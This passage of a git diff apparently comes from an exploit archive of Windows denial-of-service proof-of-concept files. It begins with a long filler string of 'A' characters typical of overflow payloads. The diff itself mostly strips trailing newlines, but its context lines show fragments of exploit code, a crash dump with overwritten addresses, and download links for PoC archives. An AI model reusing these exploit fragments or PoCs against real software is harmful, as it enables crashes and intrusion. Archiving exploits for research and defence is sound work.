AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \ No newline at end of file diff --git a/platforms/windows/dos/35.c b/platforms/windows/dos/35.c index afc1e9501..c56f9957d 100755 --- a/platforms/windows/dos/35.c +++ b/platforms/windows/dos/35.c @@ -200,4 +200,4 @@ WSACleanup(); return 1; } -// milw0rm.com [2003-05-31] +// milw0rm.com [2003-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/35000.txt b/platforms/windows/dos/35000.txt index b2973fa7c..37f99ac9e 100755 --- a/platforms/windows/dos/35000.txt +++ b/platforms/windows/dos/35000.txt @@ -273,4 +273,4 @@ Share-Alike 3.0 (United States) License: This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file diff --git a/platforms/windows/dos/3514.pl b/platforms/windows/dos/3514.pl index 00134eb72..574e64f74 100755 --- a/platforms/windows/dos/3514.pl +++ b/platforms/windows/dos/3514.pl @@ -47,4 +47,4 @@ exit; } } while (true); -# milw0rm.com [2007-03-18] +# milw0rm.com [2007-03-18] \ No newline at end of file diff --git a/platforms/windows/dos/35163.c b/platforms/windows/dos/35163.c index 3d9e022af..227165864 100755 --- a/platforms/windows/dos/35163.c +++ b/platforms/windows/dos/35163.c @@ -15,5 +15,4 @@ int egg() system ("calc"); exit(0); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/35178.py b/platforms/windows/dos/35178.py index fea8cda93..bbd47117c 100755 --- a/platforms/windows/dos/35178.py +++ b/platforms/windows/dos/35178.py @@ -39,6 +39,4 @@ payload= header + footer # Write out our malicious file writeFile = open ("iHex.xml", "wb") writeFile.write( payload ) -writeFile.close() - - +writeFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/35217.txt b/platforms/windows/dos/35217.txt index b87647910..2887f5298 100755 --- a/platforms/windows/dos/35217.txt +++ b/platforms/windows/dos/35217.txt @@ -48,6 +48,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5204.php PoC: - http://www.zeroscience.mk/codes/zsl_5204.rar - - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35217.rar - - + - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35217.rar \ No newline at end of file diff --git a/platforms/windows/dos/35363.txt b/platforms/windows/dos/35363.txt index 18160c143..517c83ca7 100755 --- a/platforms/windows/dos/35363.txt +++ b/platforms/windows/dos/35363.txt @@ -164,4 +164,4 @@ UltraCamX!DllUnregisterServer+0xeb2b: 0042eda8: 41414141 Invalid exception stack at 41414141 --- +-- \ No newline at end of file diff --git a/platforms/windows/dos/35379.go b/platforms/windows/dos/35379.go index bd65f43bd..cfa37fec9 100755 --- a/platforms/windows/dos/35379.go +++ b/platforms/windows/dos/35379.go @@ -66,4 +66,4 @@ func main() { } fmt.Printf("%s", robots) } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/354.html b/platforms/windows/dos/354.html index 4a2dc8fc7..c051788f2 100755 --- a/platforms/windows/dos/354.html +++ b/platforms/windows/dos/354.html @@ -24,4 +24,4 @@ cpop.show(1,1,1,1); </html> -// milw0rm.com [2004-07-18] +// milw0rm.com [2004-07-18] \ No newline at end of file diff --git a/platforms/windows/dos/3547.c b/platforms/windows/dos/3547.c index 3e3b9e8b3..a1c427f62 100755 --- a/platforms/windows/dos/3547.c +++ b/platforms/windows/dos/3547.c @@ -127,4 +127,4 @@ int main() return 0; /* end of work :D */ } -// milw0rm.com [2007-03-22] +// milw0rm.com [2007-03-22] \ No newline at end of file diff --git a/platforms/windows/dos/35502.pl b/platforms/windows/dos/35502.pl index af10ab5fd..8da6a8d5a 100755 --- a/platforms/windows/dos/35502.pl +++ b/platforms/windows/dos/35502.pl @@ -51,4 +51,4 @@ close(file); # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... -#================================================================================================ +#================================================================================================ \ No newline at end of file diff --git a/platforms/windows/dos/35507.pl b/platforms/windows/dos/35507.pl index 6a2e2bafa..add3fd004 100755 --- a/platforms/windows/dos/35507.pl +++ b/platforms/windows/dos/35507.pl @@ -193,6 +193,4 @@ close(file); # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... -#================================================================================================ - - +#================================================================================================ \ No newline at end of file diff --git a/platforms/windows/dos/35552.py b/platforms/windows/dos/35552.py index 4aa01ee7a..ab120b3ba 100755 --- a/platforms/windows/dos/35552.py +++ b/platforms/windows/dos/35552.py @@ -53,5 +53,4 @@ print "(+)^Xecuti0N3r: E-mail \n"; print "(+)d3M0l!tioN3r: E-mail \n"; print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n"; print "########################################################################\n\n"; -time.sleep (4); - +time.sleep (4); \ No newline at end of file diff --git a/platforms/windows/dos/356.c b/platforms/windows/dos/356.c index c3ffc41fa..79a3cab9c 100755 --- a/platforms/windows/dos/356.c +++ b/platforms/windows/dos/356.c @@ -83,4 +83,4 @@ WSACleanup(); return 0; } -// milw0rm.com [2004-07-20] +// milw0rm.com [2004-07-20] \ No newline at end of file diff --git a/platforms/windows/dos/35622.txt b/platforms/windows/dos/35622.txt index f36156975..f3a2abdd0 100755 